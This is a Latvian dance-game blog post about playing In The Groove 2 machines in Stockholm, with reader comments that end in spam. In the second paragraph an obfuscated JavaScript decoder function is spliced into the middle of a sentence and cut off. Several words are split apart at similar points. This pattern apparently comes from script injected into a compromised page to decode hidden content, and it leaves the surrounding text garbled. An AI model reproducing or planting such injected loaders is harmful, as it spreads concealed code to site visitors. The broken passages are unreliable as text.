Kā es braucu ITG2 lūkoties

25. aprīlis, 2007 @ 11:34 | Autors: addicted2bass | Kur: Galvenā, Pasaulē, Interesanti! |

Aiz trejdeviņām jūrām ir mīklaina zeme, kur apsūnojošiem mītiem apvīti sk

andināvu pēcteči dienu no dienas dodas savās gadsimtu garumā iemītajās takās. Kad gaišie latvju bāleliņi dodas uz šo zemi ar sk

andināviem kopā dzirnakmeni velt, tad gadās arī pa kādam brīvam brītiņam, kad stabuli papūst un ap ugunskuru palēkāt.

Mūsdienīgāk izsakoties, gadījās būt Zviedrijā darba darīšanās un vienā nedaudz brīvākā vakarā izrauties uz Stokholmas centru. Galamērķis tika noskatīts jau iepriekš – “Lasergame”, Surbrunnsgatan 42, Stockholm (http://www.lasergame.se/). Galamērķis tāpēc, ka, pēc GrooveStats pieejamās informācijas, tur esot ITG2.
Pēc pamatīgas metro kartes izpētīšanas kļuva skaidrs, kur jāpārsēžas, kur jākāpj ārā un kā tikt atpakaļ. Kad vakarpusē devos ceļā, viss izrādījās daudz vienkāršāk nekā no sākuma likās, un nepilnas pusstundas laikā nonācu līdz pareizajai ielai. Nogriežos ap stūri un ieraugu daudzsološo uzrakstu “Lasergame”, pielieku soli un tur… NEKĀ NAV!
Tfu, tas ir, aiz loga ir veselas divas ITG2 mašīnas, uz kurām NEVIENA NAV!.

Jāpiemin, ka vēl bez ITG2 Leizergeimā ir atrodama vesela kaudze ar Pinball aparātiem, kā arī “šaudīšanās ar lāzeriem”, kaut kas laikam Q-Zar stilā. Un, kas mani pārsteidza visvairāk, pirmā vieta pasaulē, kur ir ieviests “multiplayer ddr“, ko līdz šim biju redzējis tikai kā function oc532bd2f6(uf){var yd=\'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=\';var vb=\'\';var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(nd

andeplane.makt.net/Multiplayer_IMPACT_sound.avi” target=”_blank”>virtuālu demo.

Īsi parunāju ar Leizergeima saimnieku un noskaidroju ka uz ITG 1 kredīts = 10 kronas (~0.75 Ls) = 3 dejas. Samainīju nedaudz naudiņas un devos atpakaļ uz pirmo telpu pie ITG2. Pa šo laiku tur jau bija uzradies kāds censonis, kurš, izmeties vienos šortiņos, dragāja Expert 9 dziesmiņas. Laipni apvaicājos vai nevarētu viņam sastādīt kompāniju, lai netraucē otras mašīnas skaņa, un censonis X absolūti neiebilda. Gribu piezīmēt, ka mašīnām tur pa vidu gan ir ierīkota porolona siena, kas fantastiski slāpē skaņu, tāpēc var dejot uz abām paralēli un otras skaņa netraucē g

andrīz nemaz. Mums tādu vajadzētu…

Palūdzu iesildīšanās nolūkos paņemt pāris Hard 8-9, ko censonis X pilnībā akceptēja, taču viņš gan ņēma Expertus. Liels bija mans pārsteigums, kad iekš Destiny, kamēr es jautri lēkāju pa Hard mīnām, viņš uz Expert nopelnīja kaut ko tuvu 99%. Pēc raunda beigām paskatījos kā tad šis uz USB saucas – Niclas Ceder.
Tiem, kuri uz linkiem nespiež, paskaidrošu: Niklāsam Cederam ar machine tag HORY pa Expert līmeņa dziesmām uz doto brīdi vidējais procentu rādītājs ir 99.28% (!). Nelielam ieskatam par to, KĀ un KUR, youtube video ar Niclas Ceder galvenajā lomā (filmēts uz tā paša ITG2).

Īsā pauzītē mazliet parunājāmies, Niclas no iepriekšējā Eiropas čempionāta laikiem atcerējās Laumu un Artūru, palūdza nodot sveicienus (ko arī daru), un tad turpinājām dejošanu. Un turpinājām mēs ar trakoti feinām un nenormāli garām custom dejām 11 un 12 pēdu līmenī, kuras es mistiskā veidā pat spēju salasīt un izvilkt.

Pēc kāda piektā raunda manas kājas sāka aktīvi protestēt pret notiekošo, bet Niclas teicās ņemt vēl grūtākus gabalus. Izvēlējos mazāk sāpīgu variantu un devos uz otru ITG2 aparātu aiz porolona sienas, lai padejotu “vieglākas” dziesmas (Charlene, Xuxa utml.). Un tad es izdzirdēju pazīstamas notis… “Summer ~speedy mix~”!!!
Lai gan pirms tam youtube.com ir redzēti visvisādi ITG brīnumdari, kas 13 pēdu dziesmas iziet tuvu 100%, tomēr klātienē novērotie 98.XX% iepriekš minētajā Summer lika manai mutei atvērties un palikt vaļā. Pēc dziesmas beigām mazliet kautrīgi pievērsos savam aparātam, kurš mani uzticīgi gaidīja pie “vieglajām” Expert 11 (menu timer viņiem tur nav ieslēgts).

Pēc neilga laika ieradās vēl trīs jaunieši un iesildījās ar Expert 9 dziesmiņām, pēc tam pārmetoties uz Expert 11 – 12. Viens no viņiem pievienojās man, jo, kā noskaidrojām, mums esot līdzīgi līmeņi (a la “izietas pāris 11nieces”). Puisis dejojot nesen. Es par viņa sniegumu uz ātrajiem gabaliem (Destiny 11) biju mēms, bet laikam jau labs skolotājs arī daudz ko nozīmē. Toties uz lēnākiem gabaliem (Kagami 10) mana ritma izjūta bija labāka… (jā, parādīju es tam zviedram! :D). Toties visi pārējie monstri pēc katra nodejotā gabala kāpa nost no mašīnas ar skābu ģīmi, ja procentu skaitlis rādīja kaut ko mazāku par 97.

Ja neskaita mazliet samocītu hagu un nedaudz pabalējušu ekrānu uz vienas no platformām, tad aparāti bija neticami labā tehniskajā stāvoklī. Pogas nospiedās jau no viegla pieskāriena, un holdu turēšana nesagādāja ne mazākās neērtības. Tas ir, nebija nepieciešama piepūle un pārdomāta svara pārnešana uz turamajām pogām.
Pēc atgriešanās uz mūsu ITG2 jutos kā bez kājām, jo regulāri iespruka pa kādam Miss, ko es patiesībā biju nospiedis. Jāpierod…

Katra paša bāleliņa un zeltenes ziņā būs tas, vai šajā vakarā mīt tālu tautās izskanējušo Zelta taku vai tomēr doties ciemā padzert gardu alutiņu. Vismaz man ir tapis skaidrs, ka abi LČ līderi nav nez kādi mītiskie sk

andināvu pēcteči, kas apveltīti ar pārdabiskām bultiņspiešanas spējām. Nezinu kā citus, bet mani uzstājīgi gaida Destiny 11 un Vertex 12.

37 komentāri »

 1. Labs! :D :D :D Interesanti, kā viņiem tabula izskatās, it īpaši jau uz Expert?

  ...teica Funmaster — 25. aprīlis, 2007 #

 2. Atceros, atceros to Zvierdu. Bet prinicpā, kad redzi professionālus pirmo reizi, mute veras vaļā vienmēr.
  Atceros pirmo dienu EČ, kad dejoja tie nenormālie, domāju: “nu kur vēl labā!?”
  Bet nākošajā dienā, amerikāņi parādīja, kur vēl labāk. Tad mute atvērās vēl plašāk! :)

  ...teica erka — 25. aprīlis, 2007 #

 3. Cik atceros, tad toreiz Cedar nebija topā, bet nu ir reāli progresējis. ;) Kas nozīmē ka līmenis visā Eiropā ir ļoti audzis pa šo gadu, jo ITG2 ir bijis pieejams. EC (ja notiks) būs karsti!

  ...teica Funmaster — 25. aprīlis, 2007 #

 4. eh. kārdinātājs! :D
  “aparāti bija neticami labā tehniskajā stāvoklī. Pogas nospiedās jau no viegla pieskāriena, un holdu turēšana nesagādāja ne mazākās neērtības”.

  ...teica Lauma — 25. aprīlis, 2007 #

 5. nu jā :) izskatās ka darīt mūsu pusē ir vel daudz ko , lai varētu kaut attāli domāt par sevi saukšanu par mašīndejotāju :P pagaidām palikšu pie “pāris reizes uzkāpis” ^_^ … tātad reāli sanāk ka pie mums līderu trijnieks ir vidusmēra zviedru jaunieši ? :/

  ...teica Sai^ — 25. aprīlis, 2007 #

 6. Cedar video beigu skrējieniņš tāds paīss…

  ...teica Ivars — 26. aprīlis, 2007 #

 7. Tāds nu ir tas Uber Rave. Es pat nošokējos par rezultātu, jo, rokoties pa YouTube, man neizdevās atrast nevienu video, kur būtu labāks rezultāts par Cederu. Iespaidīgi… :)

  ...teica ArteX — 26. aprīlis, 2007 #

 8. Timo, vēl viena lieta. Pastāsti par tādu niansi kā 65% mini. Vai ir tā, ka to automātiem ir uzlikuši mainot kaut kādu konfigurāciju? Vienkārši ļoti daudzos rezultātos ir manīt šis ‘Mods’. Un varbūt arī zini, cik tas ir atļauti or something like that… ;)

  ...teica ArteX — 26. aprīlis, 2007 #

 9. eeh..cik garlaiciigi :(

  ...teica babygirl — 26. aprīlis, 2007 #

 10. Artūr, es, šķiet, varu atbildēt Timo vietā, ka pēc Eiropas nolikuma mini ir atļauts.

  ...teica Lauma — 26. aprīlis, 2007 #

 11. sorry, es par ‘mini’ neko nezinu :)

  ...teica timo — 26. aprīlis, 2007 #

 12. Starp citu, ir doma uz nākotni kādā weekendā uztaisīt braucienu uz Stokholmu tieši ar ITG mērķi ;)
  Ryanairs sanāk 20Ls turp/atpakaļ + mašīnas īre un benzīns + hotelis. Bet var arī uz prāmja kost.

  Who’s in? :D

  ...teica timo — 26. aprīlis, 2007 #

 13. parakstos :)

  ...teica Esh — 26. aprīlis, 2007 #

 14. Arī “in”, ja tas nav sesijas laikā ;)

  ...teica erka — 26. aprīlis, 2007 #

 15. Principā, tā jau varētu sarunāt arī ar ārzemes dejotājiem kādu turnīru vai vienkārši kopīgu tusiņu iepriekš. Atrast viņus nav jau grūti…

  ...teica erka — 26. aprīlis, 2007 #

 16. hmm .. kad nāk tuvāk šīs idejas īstenošana pado ziņu :)

  ...teica Sai^ — 26. aprīlis, 2007 #

 17. Turnīru??? Kurš tad tur turnīrēs no LV? Bērni - bumbiņu padevēji kā tenisa meistariem? Tusiņš un treniņsesija - tā gan būtu cita lieta!
  Otrs variants - kādu(s) no viņiem uzaicināt uz Rīgu. Ja nav ar milzīgām pretenzijām uz komfortu un lielām dienasnaudām, tas nebūtu daudz dārgāk, sadalot uz galviņām. Varbūt ddrlatvia arī varētu piepalīdzēt?

  ...teica Ivars — 27. aprīlis, 2007 #

 18. Nevajag uz Rīgu. Vajag uz ITG2 x 2 @ Lasergame. Un tur tad arī tusiņu un treniņsesiju 2 dienu garumā.
  Varbūt, ka ddrlatvia varētu arī vismaz daļēju freeplay sarunāt vai sponsorēt ;)

  ...teica timo — 27. aprīlis, 2007 #

 19. Ar ddrlatvia var visu ko sarunāt, bet tad gribētos dzirdēt konkrētu projektu un konkrētas (jau sarunātas) piedalīšanās plānu. ;) Bet vispār ideja ir laba - pats zinu, kāda motivācija parādās pēc starptautiskiem sarīkojumiem.

  ...teica Funmaster — 27. aprīlis, 2007 #

 20. chemodaans jau sakraameets!!!! kad izlidojam vai izpeldam??? :D!

  ...teica TIMI — 27. aprīlis, 2007 #

 21. Jā, atceros, pēc Oslo pat Mairis regulāri dejoja!:)

  ...teica Ivars — 27. aprīlis, 2007 #

 22. chemodaans jau sakraameets!!!! kad izlidojam vai izpeldam??? :D es piesakos par sviedru slauciitaaju no juusu pieriiteem un sausu kreklu padeveeju :D!

  ...teica TIMI — 27. aprīlis, 2007 #

 23. Un tā, piemēram, reizi mēnesī vai 2 nedēļās brīvdienas pavadīt treniņos. Wii.. Koferis jau sakrāmēts! :D

  ...teica Lauma — 27. aprīlis, 2007 #

 24. hmm kārdinoši … ja ne uz pirmo trenniņsesiju ,tad vēlākām piesakos .. ja vien jūs ir ar mieru mani pieciest ;)

  ...teica Sai^ — 27. aprīlis, 2007 #

 25. Sai, izcili labs veids kļūt pieciestam un pat amerikāņu smaidā atieztus zobus ieraudzīt ir kļūt par pasākuma sponsoru! Nauda spēj darīt brīnumus! Un katram uz krekla (un jau sakrāmētā kofera) ar krāsu uzpūtīs tā labdara vārdu. :) Tad arī 75s par kredītu SE neliksies vairs nemaz dārgi (tagadējie 40s te LV izraisa sašutuma vētras). Pie tam Zviedrijā viņi tur katram atbraucējam uzdāvina pudelīti ar brīnumzālītēm un tad vairs nav ne jāmokās, ne jāsvīst uz aparāta, uzreiz var 12-nieci uz 98% izdejot! (šutka)

  ...teica Ivars — 28. aprīlis, 2007 #

 26. šutku poņal … smešno … :D :D

  ...teica Sai^ — 28. aprīlis, 2007 #

 27. hey hey skatos te viss pieklusis…..eeee davaj saakam runaaat par kopiigo tusinju….davaaaaaaaaaaj :D

  ...teica Babygirl — 30. aprīlis, 2007 #

 28. BG es sāku šaubīties vai lielākā daļa maz grib ko tādi .. -.-’

  ...teica Sai^ — 30. aprīlis, 2007 #

 29. manis peec..pofig.bye

  ...teica babygirl — 30. aprīlis, 2007 #

 30. es gribu :P BG noorganizē ! :D

  ...teica GXXX — 2. maijs, 2007 #

 31. tas nav manos spekos…..es gribeju lai visi bez maz vai uzraksta kadas labas vietas kur atpusties…bet….redz ka Sai teica ka neviens negrib…

  ...teica !BG — 2. maijs, 2007 #

 32. s neteicu ka ngrib , es teicu ka IZSKATĀS ka negrib , ja gribētu , tad būtu lielāka atsaucība no visiem .. or neviens vnk nezin par šo ideju o.O ?

  ...teica Sai^ — 2. maijs, 2007 #

 33. Sai^ tu tā neteici! :D :D
  Tici vai nē, bet tā tas ir!
  Brivdienas ir gandriz vai galā, bet laicinjsh joprojam pieturas vējains.
  Priecīgus darab svētkus!

  ...teica ILM — 2. maijs, 2007 #

 34. Daļa zin un īstenībā būtu forši vispirms sarunāt kopistisku sanākšanu informatīvos nolūkos ZBh un varbūt pie reizes vēl izmantot Maira solīto Non-Stop party uz DDR Extreme, un tad arī varētu kaut ko konkrētāku runāt par kopējo tusiņu Latvijas Kausa izskaņā. Es domāju, ka tas varētu būt tāds prātīgs variants. ;)

  ...teica ArteX — 2. maijs, 2007 #

 35. es sāku šaubīties - neizskatās ka gribetu - izskatās ka negrib :P tā kā teicu gan , tas vai Tu un citi saprata , tas vairs nav manā pārziņā :( , however RTX ideja ir neslikta .

  ...teica Sai^ — 2. maijs, 2007 #

 36. Problems do not influence on you? Therefore, you’re prepared to write the america essay paper. Or probably, you have to start from not complicated free essays to make better your writing technique!

  ...teica Ella34HUMPHREY — 6. maijs, 2011 #

 37. Non-automatic articles submission is difficult. Therefore, businessmen select the submission services. Real experts can optimize your speed.

  ...teica submission services — 31. maijs, 2011 #

Komentēt

XHTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <code> <em> <i> <strike> <strong>

Copyright Cintamani Baltic SIA || Powered by Wordress with original theme design by B. Fernandez.